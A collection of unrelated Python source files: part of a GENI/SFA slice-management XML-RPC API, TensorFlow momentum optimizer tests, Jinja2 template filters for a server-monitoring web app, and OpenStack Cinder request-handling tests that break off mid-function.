except Exception as e:
msg = "Exception: %s" %str(e)
propertyList = self.buildPropertyList(GENI_ERROR_CODE.ERROR, output=msg)
self._log.exception(msg)
finally:
return propertyList
def pub_Start(self,xrn, creds):
try:
self.pm.check_permissions('Start',locals())
except Exception as e:
return self.buildPropertyList(GENI_ERROR_CODE.CREDENTIAL_INVALID, output=e)
xrn = Xrn(xrn)
slice_urn = xrn.get_urn()
slice_leaf = xrn.get_leaf()
authority = xrn.get_authority_hrn()
return self.buildPropertyList(GENI_ERROR_CODE.SUCCESS, value=True)
def pub_Stop(self,xrn, creds):
try:
self.pm.check_permissions('Start',locals())
except Exception as e:
return self.buildPropertyList(GENI_ERROR_CODE.CREDENTIAL_INVALID, output=e)
xrn = Xrn(xrn)
slice_urn = xrn.get_urn()
slice_leaf = xrn.get_leaf()
authority = xrn.get_authority_hrn()
return self.buildPropertyList(GENI_ERROR_CODE.SUCCESS, value=True)
def pub_reset_slice(self, xrn):
xrn = Xrn(xrn)
slice_urn = xrn.get_urn()
slice_leaf = xrn.get_leaf()
authority = xrn.get_authority_hrn()
return self.buildPropertyList(GENI_ERROR_CODE.SUCCESS, value=True)
def pub_GetTicket(self, api, xrn, creds, rspec, users, options):
# ticket is dead.
raise Exception('Method GetTicket was deprecated.')
def pub_SliverStatus (self, slice_xrn=None, creds=[], options={}):
try:
self.pm.check_permissions('SliverStatus',locals())
except Exception as e:
return self.buildPropertyList(GENI_ERROR_CODE.CREDENTIAL_INVALID, output=e)
try:
slivers = GeniDB.getSliverList()
try:
sliver = get_slice_details_from_slivers(slivers, slice_xrn)
except:
raise Exception("Sliver for slice URN (%s) does not exist" % (slice_xrn))
result= dict()
result["slice_urn"] = slice_xrn
result["sliver_urn"] = sliver["sliver_urn"]
result["status"] = sliver["status"]
result["created"] = sliver["creation"]
result["description"] = sliver["desc"]
result["expires"] = sliver["expiration"]
propertyList = self.buildPropertyList(GENI_ERROR_CODE.SUCCESS, value=result)
except UnknownSlice as e:
msg = "Attempt to get status on unknown sliver for slice %s" % (slice_xrn)
propertyList = self.buildPropertyList(GENI_ERROR_CODE.SEARCHFAILED, output=msg)
e.log(self._log, msg, logging.INFO)
except Exception as e:
msg = "Exception: %s" % str(e)
propertyList = self.buildPropertyList(GENI_ERROR_CODE.ERROR, output=msg)
self._log.exception(msg)
finally:
return propertyList
def pub_Ping(self, message):
return message
def buildPropertyList(self, geni_code, value="", output=""):
#{'output': '', 'geni_api': 2, 'code': {'am_type': 'sfa', 'geni_code': 0}, 'value': rspec}
result = {}
result["geni_api"] = 2
result["code"] = {'geni_code': geni_code , "am_type":"sfa"}
# Non-zero geni_code implies error: output is required, value is optional
if geni_code:
result["output"] = output
if value:
result["value"] = value
# Zero geni_code implies success: value is required, output is optional
else:
result["value"] = value
return result
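# Illustrative shapes of the structures built above (assuming GENI_ERROR_CODE.SUCCESS
# is 0 and any non-zero code signals an error):
#   buildPropertyList(GENI_ERROR_CODE.SUCCESS, value={'foo': 1})
#     -> {'geni_api': 2, 'code': {'geni_code': 0, 'am_type': 'sfa'}, 'value': {'foo': 1}}
#   buildPropertyList(GENI_ERROR_CODE.ERROR, output='something went wrong')
#     -> {'geni_api': 2, 'code': {'geni_code': <error code>, 'am_type': 'sfa'}, 'output': 'something went wrong'}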
def recordAction (self, action, credentials = [], urn = None):
cred_ids = []
self._actionLog.info("Sliver: %s LegExpAPI Action: %s" % (urn, action))
for cred in credentials:
self._actionLog.info("Credential: %s" % (cred))
def setup (app):
sfa_api = XMLRPCHandler('sfaapi')
sfa_api.connect(app, '/sfa/2/')
sfa_api.register_instance(SfaApi(app.logger))
app.logger.info("[SfaApi] Loaded.")
return sfa_api
|
|
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for Momentum."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow.python.platform
import numpy as np
from six.moves import xrange # pylint: disable=redefined-builtin
import tensorflow as tf
class MomentumOptimizerTest(tf.test.TestCase):
def testBasic(self):
with self.test_session():
var0 = tf.Variable([1.0, 2.0])
var1 = tf.Variable([3.0, 4.0])
grads0 = tf.constant([0.1, 0.1])
grads1 = tf.constant([0.01, 0.01])
mom_opt = tf.train.MomentumOptimizer(learning_rate=2.0, momentum=0.9)
mom_update = mom_opt.apply_gradients(zip([grads0, grads1], [var0, var1]))
tf.initialize_all_variables().run()
# Check we have slots
self.assertEqual(["momentum"], mom_opt.get_slot_names())
slot0 = mom_opt.get_slot(var0, "momentum")
self.assertEquals(slot0.get_shape(), var0.get_shape())
self.assertFalse(slot0 in tf.trainable_variables())
slot1 = mom_opt.get_slot(var1, "momentum")
self.assertEquals(slot1.get_shape(), var1.get_shape())
self.assertFalse(slot1 in tf.trainable_variables())
# Fetch params to validate initial values
self.assertAllClose([1.0, 2.0], var0.eval())
self.assertAllClose([3.0, 4.0], var1.eval())
# Step 1: the momentum accumulators were 0. So we should see a normal
# update: v -= grad * learning_rate
mom_update.run()
# Check that the momentum accumulators have been updated.
self.assertAllClose(np.array([0.1, 0.1]), slot0.eval())
self.assertAllClose(np.array([0.01, 0.01]), slot1.eval())
# Check that the parameters have been updated.
self.assertAllClose(np.array([1.0 - (0.1 * 2.0),
2.0 - (0.1 * 2.0)]),
var0.eval())
self.assertAllClose(np.array([3.0 - (0.01 * 2.0),
4.0 - (0.01 * 2.0)]),
var1.eval())
# Step 2: the momentum accumulators contain the previous update.
mom_update.run()
# Check that the momentum accumulators have been updated.
self.assertAllClose(np.array([(0.9 * 0.1 + 0.1), (0.9 * 0.1 + 0.1)]),
slot0.eval())
self.assertAllClose(np.array([(0.9 * 0.01 + 0.01), (0.9 * 0.01 + 0.01)]),
slot1.eval())
# Check that the parameters have been updated.
self.assertAllClose(
np.array([1.0 - (0.1 * 2.0) - ((0.9 * 0.1 + 0.1) * 2.0),
2.0 - (0.1 * 2.0) - ((0.9 * 0.1 + 0.1) * 2.0)]),
var0.eval())
self.assertAllClose(np.array([2.98 - ((0.9 * 0.01 + 0.01) * 2.0),
3.98 - ((0.9 * 0.01 + 0.01) * 2.0)]),
var1.eval())
def testTensorLearningRateAndMomentum(self):
with self.test_session():
var0 = tf.Variable([1.0, 2.0])
var1 = tf.Variable([3.0, 4.0])
grads0 = tf.constant([0.1, 0.1])
grads1 = tf.constant([0.01, 0.01])
mom_opt = tf.train.MomentumOptimizer(
learning_rate=tf.constant(2.0), momentum=tf.constant(0.9))
mom_update = mom_opt.apply_gradients(zip([grads0, grads1], [var0, var1]))
tf.initialize_all_variables().run()
# Check we have slots
self.assertEqual(["momentum"], mom_opt.get_slot_names())
slot0 = mom_opt.get_slot(var0, "momentum")
self.assertEquals(slot0.get_shape(), var0.get_shape())
self.assertFalse(slot0 in tf.trainable_variables())
slot1 = mom_opt.get_slot(var1, "momentum")
self.assertEquals(slot1.get_shape(), var1.get_shape())
self.assertFalse(slot1 in tf.trainable_variables())
# Fetch params to validate initial values
self.assertAllClose([1.0, 2.0], var0.eval())
self.assertAllClose([3.0, 4.0], var1.eval())
# Step 1: the momentum accumulators were 0. So we should see a normal
# update: v -= grad * learning_rate
mom_update.run()
# Check that the momentum accumulators have been updated.
self.assertAllClose(np.array([0.1, 0.1]), slot0.eval())
self.assertAllClose(np.array([0.01, 0.01]), slot1.eval())
# Check that the parameters have been updated.
self.assertAllClose(np.array([1.0 - (0.1 * 2.0),
2.0 - (0.1 * 2.0)]),
var0.eval())
self.assertAllClose(np.array([3.0 - (0.01 * 2.0),
4.0 - (0.01 * 2.0)]),
var1.eval())
# Step 2: the momentum accumulators contain the previous update.
mom_update.run()
# Check that the momentum accumulators have been updated.
self.assertAllClose(np.array([(0.9 * 0.1 + 0.1), (0.9 * 0.1 + 0.1)]),
slot0.eval())
self.assertAllClose(np.array([(0.9 * 0.01 + 0.01), (0.9 * 0.01 + 0.01)]),
slot1.eval())
# Check that the parameters have been updated.
self.assertAllClose(
np.array([1.0 - (0.1 * 2.0) - ((0.9 * 0.1 + 0.1) * 2.0),
2.0 - (0.1 * 2.0) - ((0.9 * 0.1 + 0.1) * 2.0)]),
var0.eval())
self.assertAllClose(np.array([2.98 - ((0.9 * 0.01 + 0.01) * 2.0),
3.98 - ((0.9 * 0.01 + 0.01) * 2.0)]),
var1.eval())
def testFloat64(self):
with self.test_session():
opt = tf.train.MomentumOptimizer(learning_rate=2.0, momentum=0.9)
# compute_gradients.
values = [1.0, 3.0]
good_vars = [tf.Variable([v]) for v in values]
bad_loss = tf.constant(2.0, tf.float64, name="bad_loss")
self.assertRaisesRegexp(
ValueError, r"Invalid type.*float64.*bad_loss.*expected.*float32",
opt.compute_gradients, bad_loss, good_vars)
bad_vars = [
tf.Variable(np.array([v], np.float64), name="bad_var")
for v in values]
self.assertRaisesRegexp(
ValueError, r"Invalid type.*float64.*bad_var.*expected.*float32",
opt.compute_gradients, tf.cast(bad_vars[0] + bad_vars[1], tf.float32),
bad_vars)
opt.compute_gradients(good_vars[0] + good_vars[1], good_vars)
# apply_gradients.
bad_grads = [
tf.constant([0.1], dtype=np.float64, name="bad_grad"),
tf.constant([0.01])]
self.assertRaisesRegexp(
ValueError, r"Invalid type.*float64.*bad_grad.*expected.*float32",
opt.apply_gradients, zip(bad_grads, good_vars))
good_grads = [tf.constant([0.01]), tf.constant([0.02])]
self.assertRaisesRegexp(
ValueError, r"Invalid type.*float64.*bad_var.*expected.*float32",
opt.apply_gradients, zip(good_grads, bad_vars))
opt.apply_gradients(zip(good_grads, good_vars))
def _dbParamsMom01(self):
"""Return dist-belief momentum values.
These values were generated by the dist-belief momentum unittest,
running with a learning rate of 0.1 and a momentum of 0.1.
These values record how a parameter vector of size 10, initialized with 0.0,
gets updated with 10 consecutive momentum steps. It uses random gradients.
Returns:
db_grad: The gradients to apply
db_out: The parameters after the momentum update.
"""
db_grad = [[]] * 10
db_out = [[]] * 10
# pylint: disable=line-too-long
db_grad[0] = [0.00096264342, 0.17914793, 0.93945462, 0.41396621, 0.53037018, 0.93197989, 0.78648776, 0.50036013, 0.55345792, 0.96722615]
db_out[0] = [-9.6264346e-05, -0.017914793, -0.093945466, -0.041396622, -0.053037018, -0.093197994, -0.078648776, -0.050036013, -0.055345792, -0.096722618]
db_grad[1] = [0.17075552, 0.88821375, 0.20873757, 0.25236958, 0.57578111, 0.15312378, 0.5513742, 0.94687688, 0.16012503, 0.22159521]
db_out[1] = [-0.017181443, -0.10852765, -0.12421377, -0.070773244, -0.11591884, -0.11783017, -0.14165108, -0.14972731, -0.076892875, -0.1285544]
db_grad[2] = [0.35077485, 0.47304362, 0.44412705, 0.44368884, 0.078527533, 0.81223965, 0.31168157, 0.43203235, 0.16792089, 0.24644311]
db_out[2] = [-0.053967446, -0.1648933, -0.1716533, -0.1180798, -0.13005978, -0.20151734, -0.17911947, -0.20289968, -0.095839672, -0.15638189]
db_grad[3] = [0.9694621, 0.75035888, 0.28171822, 0.83813518, 0.53807181, 0.3728098, 0.81454384, 0.03848977, 0.89759839, 0.93665648]
db_out[3] = [-0.15459226, -0.24556576, -0.20456907, -0.20662397, -0.18528105, -0.24716705, -0.2643207, -0.21206589, -0.18749419, -0.2528303]
db_grad[4] = [0.38578293, 0.8536852, 0.88722926, 0.66276771, 0.13678469, 0.94036359, 0.69107032, 0.81897682, 0.5433259, 0.67860287]
db_out[4] = [-0.20323303, -0.33900154, -0.29658359, -0.28175515, -0.20448165, -0.34576839, -0.34194785, -0.29488021, -0.25099224, -0.33033544]
db_grad[5] = [0.27885768, 0.76100707, 0.24625534, 0.81354135, 0.18959245, 0.48038563, 0.84163809, 0.41172323, 0.83259648, 0.44941229]
db_out[5] = [-0.23598288, -0.42444581, -0.33041057, -0.3706224, -0.22536094, -0.40366709, -0.43387437, -0.34433398, -0.34060168, -0.38302717]
db_grad[6] = [0.27233034, 0.056316052, 0.5039115, 0.24105175, 0.35697976, 0.75913221, 0.73577434, 0.16014607, 0.57500273, 0.071136251]
db_out[6] = [-0.26649091, -0.43862185, -0.38418442, -0.40361428, -0.26314685, -0.48537019, -0.51664448, -0.36529395, -0.40706289, -0.39540997]
db_grad[7] = [0.58697265, 0.2494842, 0.08106143, 0.39954534, 0.15892942, 0.12683646, 0.74053431, 0.16033, 0.66625422, 0.73515922]
db_out[7] = [-0.32823896, -0.46498787, -0.39766794, -0.446868, -0.28281838, -0.50622416, -0.59897494, -0.38342294, -0.48033443, -0.47016418]
db_grad[8] = [0.8215279, 0.41994119, 0.95172721, 0.68000203, 0.79439718, 0.43384039, 0.55561525, 0.22567581, 0.93331909, 0.29438227]
db_out[8] = [-0.41656655, -0.50961858, -0.49418902, -0.51919359, -0.36422527, -0.55169362, -0.6627695, -0.40780342, -0.58099347, -0.50707781]
db_grad[9] = [0.68297005, 0.67758518, 0.1748755, 0.13266537, 0.70697063, 0.055731893, 0.68593478, 0.50580865, 0.12602448, 0.093537711]
db_out[9] = [-0.49369633, -0.58184016, -0.52132869, -0.5396927, -0.44306302, -0.56181377, -0.73774242, -0.46082234, -0.60366184, -0.52012295]
# pylint: enable=line-too-long
return db_grad, db_out
def testLikeDistBeliefMom01(self):
with self.test_session():
db_grad, db_out = self._dbParamsMom01()
num_samples = len(db_grad)
var0 = tf.Variable([0.0] * num_samples)
grads0 = tf.constant([0.0] * num_samples)
mom_opt = tf.train.MomentumOptimizer(learning_rate=0.1, momentum=0.1)
mom_update = mom_opt.apply_gradients(zip([grads0], [var0]))
tf.initialize_all_variables().run()
for i in xrange(num_samples):
mom_update.run(feed_dict={grads0: db_grad[i]})
self.assertAllClose(np.array(db_out[i]), var0.eval())
def testSparse(self):
with self.test_session():
var0 = tf.Variable(tf.zeros([4, 2]))
var1 = tf.Variable(
tf.constant(1.0, tf.float32, [4, 2]))
grads0 = tf.IndexedSlices(tf.constant([[.1, .1]]),
tf.constant([1]),
tf.constant([4, 2]))
grads1 = tf.IndexedSlices(tf.constant([[.01, .01], [.01, .01]]),
tf.constant([2, 3]),
tf.constant([4, 2]))
mom_opt = tf.train.MomentumOptimizer(learning_rate=2.0, momentum=0.9)
mom_update = mom_opt.apply_gradients(zip([grads0, grads1], [var0, var1]))
tf.initialize_all_variables().run()
# Check we have slots
self.assertEqual(["momentum"], mom_opt.get_slot_names())
slot0 = mom_opt.get_slot(var0, "momentum")
self.assertEquals(slot0.get_shape(), var0.get_shape())
slot1 = mom_opt.get_slot(var1, "momentum")
self.assertEquals(slot1.get_shape(), var1.get_shape())
# Fetch params to validate initial values
self.assertAllClose([0, 0], var0.eval()[0])
self.assertAllClose([0, 0], var0.eval()[1])
self.assertAllClose([1, 1], var1.eval()[2])
# Step 1: the momentum accumulators are 0. So we should see a normal
# update: v -= grad * learning_rate
mom_update.run()
# Check that the momentum accumulators have been updated.
self.assertAllClose(np.array([0, 0]), slot0.eval()[0])
self.assertAllClose(np.array([.1, .1]), slot0.eval()[1])
self.assertAllClose(np.array([.01, .01]), slot1.eval()[2])
# Check that the parameters have been updated.
self.assertAllClose(np.array([0, 0]), var0.eval()[0])
self.assertAllClose(np.array([- (0.1 * 2.0),
- (0.1 * 2.0)]),
var0.eval()[1])
self.assertAllClose(np.array([1.0 - (0.01 * 2.0),
1.0 - (0.01 * 2.0)]),
var1.eval()[2])
# Step 2: the momentum accumulators contain the previous update.
mom_update.run()
# Check that the momentum accumulators have been updated.
self.assertAllClose(np.array([0, 0]), slot0.eval()[0])
self.assertAllClose(np.array([(0.9 * 0.1 + 0.1),
(0.9 * 0.1 + 0.1)]),
slot0.eval()[1])
self.assertAllClose(np.array([(0.9 * 0.01 + 0.01),
(0.9 * 0.01 + 0.01)]),
slot1.eval()[2])
# Check that the parameters have been updated.
self.assertAllClose(np.array([0, 0]), var0.eval()[0])
self.assertAllClose(
np.array([- (0.1 * 2.0) - ((0.9 * 0.1 + 0.1) * 2.0),
- (0.1 * 2.0) - ((0.9 * 0.1 + 0.1) * 2.0)]),
var0.eval()[1])
self.assertAllClose(np.array([0.98 - ((0.9 * 0.01 + 0.01) * 2.0),
0.98 - ((0.9 * 0.01 + 0.01) * 2.0)]),
var1.eval()[2])
def testSharing(self):
with self.test_session():
var0 = tf.Variable([1.0, 2.0])
var1 = tf.Variable([3.0, 4.0])
grads0 = tf.constant([0.1, 0.1])
grads1 = tf.constant([0.01, 0.01])
mom_opt = tf.train.MomentumOptimizer(learning_rate=2.0, momentum=0.9)
mom_update1 = mom_opt.apply_gradients(zip([grads0, grads1], [var0, var1]))
mom_update2 = mom_opt.apply_gradients(zip([grads0, grads1], [var0, var1]))
tf.initialize_all_variables().run()
self.assertEqual(["momentum"], mom_opt.get_slot_names())
slot0 = mom_opt.get_slot(var0, "momentum")
self.assertEquals(slot0.get_shape(), var0.get_shape())
slot1 = mom_opt.get_slot(var1, "momentum")
self.assertEquals(slot1.get_shape(), var1.get_shape())
# Fetch params to validate initial values
self.assertAllClose([1.0, 2.0], var0.eval())
self.assertAllClose([3.0, 4.0], var1.eval())
# Step 1: the momentum accumulators were 0. So we should see a normal
# update: v -= grad * learning_rate
mom_update1.run()
# Check that the momentum accumulators have been updated.
self.assertAllClose(np.array([0.1, 0.1]), slot0.eval())
self.assertAllClose(np.array([0.01, 0.01]), slot1.eval())
# Check that the parameters have been updated.
self.assertAllClose(np.array([1.0 - (0.1 * 2.0),
2.0 - (0.1 * 2.0)]),
var0.eval())
self.assertAllClose(np.array([3.0 - (0.01 * 2.0),
4.0 - (0.01 * 2.0)]),
var1.eval())
# Step 2: the second momentum accumulators contain the previous update.
mom_update2.run()
# Check that the momentum accumulators have been updated.
self.assertAllClose(np.array([(0.9 * 0.1 + 0.1), (0.9 * 0.1 + 0.1)]),
slot0.eval())
self.assertAllClose(np.array([(0.9 * 0.01 + 0.01), (0.9 * 0.01 + 0.01)]),
slot1.eval())
# Check that the parameters have been updated.
self.assertAllClose(
np.array([1.0 - (0.1 * 2.0) - ((0.9 * 0.1 + 0.1) * 2.0),
2.0 - (0.1 * 2.0) - ((0.9 * 0.1 + 0.1) * 2.0)]),
var0.eval())
self.assertAllClose(np.array([2.98 - ((0.9 * 0.01 + 0.01) * 2.0),
3.98 - ((0.9 * 0.01 + 0.01) * 2.0)]),
var1.eval())
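# A standalone reference sketch (not part of the TensorFlow API) of the classic momentum
# update that the expectations above are written against, assuming
#   accum <- momentum * accum + grad
#   var   <- var - learning_rate * accum
def _momentum_reference_step(var, grad, accum, learning_rate=2.0, momentum=0.9):
  """Apply one momentum step with plain numpy; returns (new_var, new_accum)."""
  accum = momentum * np.asarray(accum) + np.asarray(grad)
  var = np.asarray(var) - learning_rate * accum
  return var, accum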
if __name__ == "__main__":
tf.test.main()
|
|
from __future__ import division
from jinja2 import Environment, FileSystemLoader
from amonone.core import settings
from amonone.web.settings import TEMPLATES_DIR
from amonone import __version__
from datetime import datetime, time
from amonone.utils.dates import (
utc_unixtime_to_localtime,
dateformat_local,
dateformat,
timeformat
)
from amonone.web.libs.jinja2htmlcompress import SelectiveHTMLCompress
import re
try:
import json
except:
import simplejson as json
def age(from_date, since_date = None, target_tz=None, include_seconds=False):
'''
Returns the age as a string
'''
if since_date is None:
since_date = datetime.now(target_tz)
distance_in_time = since_date - from_date
distance_in_seconds = int(round(abs(distance_in_time.days * 86400 + distance_in_time.seconds)))
distance_in_minutes = int(round(distance_in_seconds/60))
if distance_in_minutes <= 1:
if include_seconds:
for remainder in [5, 10, 20]:
if distance_in_seconds < remainder:
return "less than %s seconds" % remainder
if distance_in_seconds < 40:
return "half a minute"
elif distance_in_seconds < 60:
return "less than a minute"
else:
return "1 minute"
else:
if distance_in_minutes == 0:
return "less than a minute"
else:
return "1 minute"
elif distance_in_minutes < 45:
return "%s minutes" % distance_in_minutes
elif distance_in_minutes < 90:
return "about 1 hour"
elif distance_in_minutes < 1440:
return "about %d hours" % (round(distance_in_minutes / 60.0))
elif distance_in_minutes < 2880:
return "1 day"
elif distance_in_minutes < 43200:
return "%d days" % (round(distance_in_minutes / 1440))
elif distance_in_minutes < 86400:
return "about 1 month"
elif distance_in_minutes < 525600:
return "%d months" % (round(distance_in_minutes / 43200))
elif distance_in_minutes < 1051200:
return "about 1 year"
else:
return "over %d years" % (round(distance_in_minutes / 525600))
# Custom filters
def time_in_words(value):
'''
Usage: {{ my_date_variable|time_in_words }}
'''
# if DateTimeField() or datetime.datetime variable
try:
time_ago = age(value)
except:
null_time = time()
time_ago = age(datetime.combine(value, null_time))
return time_ago
def date_to_js(value, format='%Y, %m, %d, %H, %M'):
# Converts unixtime to a javascript Date list
_ = datetime.utcfromtimestamp(value)
js_time_list = _.strftime(format).split(',')
# Subtract one from the month because in JS January is 0, February is 1, etc.
js_time_list[1] = str(int(js_time_list[1])-1)
return ",".join(js_time_list)
def to_int(value):
number = re.compile('(\d+)')
try:
_int = number.search(value).group(1)
except:
_int = 0
return int(_int)
# TODO - write tests
def extract_days_from_unixdate(value, days):
day = 86400 # 1 day in seconds
return value-(day*days)
# Removes the letters from a string
# From 24.5MB -> 24.5 -> used in the progress width
def clean_string(variable):
if isinstance(variable, int)\
or isinstance(variable, float)\
or isinstance(variable, long):
variable = float(variable) if not isinstance(variable, float) else variable
return variable
else:
value_regex = re.compile(r'\d+[\.,]\d+')
extracted_value = value_regex.findall(variable)
if len(extracted_value) > 0:
extracted_value = extracted_value[0]
extracted_value.replace(",",".")
extracted_value = float(extracted_value)
else:
extracted_value = 0
return extracted_value
# Used in the charts, where a disk drive name may contain several slashes
def clean_slashes(string):
return re.sub('[^A-Za-z0-9]+', '', string).strip().lower()
def check_additional_data(list_with_dicts):
valid_keys = ['occurrence']
for dict in list_with_dicts:
for key in dict.keys():
if key not in valid_keys:
return True
# Combine several parameters with /
# Used with the base_url -> {{ base_url|url('system') }} -> http://host/system
def url(*args):
http_slash = '/'
url = http_slash.join(args)
return url
def beautify_json(value):
if isinstance(value, dict):
return json.dumps(value, indent=4) # Remove the unicode symbol
else:
return value
# Used in the log page. Displays the expand button if the value is a dictionary
def is_dict(value):
if isinstance(value, dict):
return True
else:
return False
# Used in the log page. Checks the log tag
def is_str(value):
if isinstance(value, str) or isinstance(value, unicode):
return True
else:
return False
def get_active_page(value, key):
elements = value.split(':')
try:
return elements[key]
except:
return None
# url -> usually the base url -> http://something.com
# params_dict -> dict {"tags": ['test', 'some'], "other_param": ['test']}
def query_dict(url, params_dict, page=None):
query_lists = []
for dict in params_dict:
dict_items = []
values_list = params_dict[dict]
if values_list:
for value in values_list:
dict_items.append("{0}={1}".format(dict, value))
# Join all the values
query_lists.append("&".join(dict_items))
# Finally, prefix the query with ? and join the different params with &
query_string = url
if len(query_lists) > 0:
query_string+='?'
query_string+= "&".join(query_lists)
if page != None:
query_string+="&page={0}".format(page)
# No params - only the page number
else:
if page != None:
query_string+="?page={0}".format(page)
return query_string
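# Illustrative example (hypothetical values):
#   query_dict('http://host/logs', {'tags': ['db', 'web']}, page=2)
#     -> "http://host/logs?tags=db&tags=web&page=2"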
def base_url():
if settings.PROXY is None:
host = settings.WEB_APP['host']
port = settings.WEB_APP['port']
base_url = "{0}:{1}".format(host, port)
return base_url
else:
return ''
# Removes the scientific notation and displays floats normally
def format_float(value):
return format(float(value), "g")
# Converts bytes to megabytes
def to_mb(value):
value = value/(1024*1024)
return "{0:.2F}MB".format(float(value))
def dehumanize(value):
values_dict = {
"more_than": ">",
"less_than": "<",
"minute": "1 minute",
"five_minutes": "5 minutes",
"fifteen_minutes": "15 minutes"
}
try:
_value = values_dict[value]
except:
_value = ''
return _value
# Gets the key from a dictionary, doesn't break the template
def get_key(dict, key):
value = dict.get(key, None)
return value
def render(template, *args, **kwargs):
env = Environment(loader=FileSystemLoader(TEMPLATES_DIR),
extensions=[SelectiveHTMLCompress])
env.globals['base_url'] = base_url()
env.globals['version'] = __version__
env.filters['url'] = url
# Used everywhere
env.filters['time'] = timeformat
env.filters['date_to_js'] = date_to_js
env.filters['date'] = dateformat
env.filters['date_local'] = dateformat_local
env.filters['to_int'] = to_int
env.filters['time_in_words'] = time_in_words
env.filters['test_additional_data'] = check_additional_data
env.filters['clean_slashes'] = clean_slashes
env.filters['beautify_json'] = beautify_json
env.filters['get_active_page'] = get_active_page # Used to mark links as active
env.filters['extract_days_from_unixdate'] = extract_days_from_unixdate
# Dashboard filters
env.filters['format_float'] = format_float
# Log filters
env.filters['is_dict'] = is_dict
env.filters['is_str'] = is_str
env.filters['query_dict'] = query_dict
# Settings
env.filters['dehumanize'] = dehumanize
env.filters['to_mb'] = to_mb
# ACL
# Utilities
env.filters['get_key'] = get_key
try:
template = env.get_template(template)
except Exception, e:
raise
# Global variables
env.globals['acl'] = settings.ACL
return template.render(*args, **kwargs)
|
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import inspect
import webob
from cinder.api.openstack import wsgi
from cinder import exception
from cinder import test
from cinder.tests.unit.api import fakes
class RequestTest(test.TestCase):
def test_content_type_missing(self):
request = wsgi.Request.blank('/tests/123', method='POST')
request.body = "<body />"
self.assertIsNone(request.get_content_type())
def test_content_type_unsupported(self):
request = wsgi.Request.blank('/tests/123', method='POST')
request.headers["Content-Type"] = "text/html"
request.body = "asdf<br />"
self.assertRaises(exception.InvalidContentType,
request.get_content_type)
def test_content_type_with_charset(self):
request = wsgi.Request.blank('/tests/123')
request.headers["Content-Type"] = "application/json; charset=UTF-8"
result = request.get_content_type()
self.assertEqual("application/json", result)
def test_content_type_from_accept(self):
for content_type in ('application/xml',
'application/vnd.openstack.volume+xml',
'application/json',
'application/vnd.openstack.volume+json'):
request = wsgi.Request.blank('/tests/123')
request.headers["Accept"] = content_type
result = request.best_match_content_type()
self.assertEqual(content_type, result)
def test_content_type_from_accept_best(self):
request = wsgi.Request.blank('/tests/123')
request.headers["Accept"] = "application/xml, application/json"
result = request.best_match_content_type()
self.assertEqual("application/json", result)
request = wsgi.Request.blank('/tests/123')
request.headers["Accept"] = ("application/json; q=0.3, "
"application/xml; q=0.9")
result = request.best_match_content_type()
self.assertEqual("application/xml", result)
def test_content_type_from_query_extension(self):
request = wsgi.Request.blank('/tests/123.xml')
result = request.best_match_content_type()
self.assertEqual("application/xml", result)
request = wsgi.Request.blank('/tests/123.json')
result = request.best_match_content_type()
self.assertEqual("application/json", result)
request = wsgi.Request.blank('/tests/123.invalid')
result = request.best_match_content_type()
self.assertEqual("application/json", result)
def test_content_type_accept_and_query_extension(self):
request = wsgi.Request.blank('/tests/123.xml')
request.headers["Accept"] = "application/json"
result = request.best_match_content_type()
self.assertEqual("application/xml", result)
def test_content_type_accept_default(self):
request = wsgi.Request.blank('/tests/123.unsupported')
request.headers["Accept"] = "application/unsupported1"
result = request.best_match_content_type()
self.assertEqual("application/json", result)
def test_best_match_language(self):
# Test that we are actually invoking language negotiation by webob
request = wsgi.Request.blank('/')
accepted = 'unknown-lang'
request.headers = {'Accept-Language': accepted}
def fake_best_match(self, offers, default_match=None):
# Match would return None, if requested lang is not found
return None
self.stubs.SmartSet(request.accept_language,
'best_match', fake_best_match)
self.assertIsNone(request.best_match_language())
# If accept-language is not included or empty, match should be None
request.headers = {'Accept-Language': ''}
self.assertIsNone(request.best_match_language())
request.headers.pop('Accept-Language')
self.assertIsNone(request.best_match_language())
def test_cache_and_retrieve_resources(self):
request = wsgi.Request.blank('/foo')
# Test that trying to retrieve a cached object on
# an empty cache fails gracefully
self.assertIsNone(request.cached_resource())
self.assertIsNone(request.cached_resource_by_id('r-0'))
resources = []
for x in range(3):
resources.append({'id': 'r-%s' % x})
# Cache an empty list of resources using the default name
request.cache_resource([])
self.assertEqual({}, request.cached_resource())
self.assertIsNone(request.cached_resource('r-0'))
# Cache some resources
request.cache_resource(resources[:2])
# Cache one resource
request.cache_resource(resources[2])
# Cache a different resource name
other_resource = {'id': 'o-0'}
request.cache_resource(other_resource, name='other-resource')
self.assertEqual(resources[0], request.cached_resource_by_id('r-0'))
self.assertEqual(resources[1], request.cached_resource_by_id('r-1'))
self.assertEqual(resources[2], request.cached_resource_by_id('r-2'))
self.assertIsNone(request.cached_resource_by_id('r-3'))
self.assertEqual({'r-0': resources[0],
'r-1': resources[1],
'r-2': resources[2]}, request.cached_resource())
self.assertEqual(other_resource,
request.cached_resource_by_id('o-0',
name='other-resource'))
def test_cache_and_retrieve_volumes(self):
self._test_cache_and_retrieve_resources('volume')
def test_cache_and_retrieve_volume_types(self):
self._test_cache_and_retrieve_resources('volume_type')
def test_cache_and_retrieve_snapshots(self):
self._test_cache_and_retrieve_resources('snapshot')
def test_cache_and_retrieve_backups(self):
self._test_cache_and_retrieve_resources('backup')
def _test_cache_and_retrieve_resources(self, resource_name):
"""Generic helper for cache tests."""
cache_all_func = 'cache_db_%ss' % resource_name
cache_one_func = 'cache_db_%s' % resource_name
get_db_all_func = 'get_db_%ss' % resource_name
get_db_one_func = 'get_db_%s' % resource_name
r = wsgi.Request.blank('/foo')
resources = []
for x in range(3):
resources.append({'id': 'id%s' % x})
# Store 2
getattr(r, cache_all_func)(resources[:2])
# Store 1
getattr(r, cache_one_func)(resources[2])
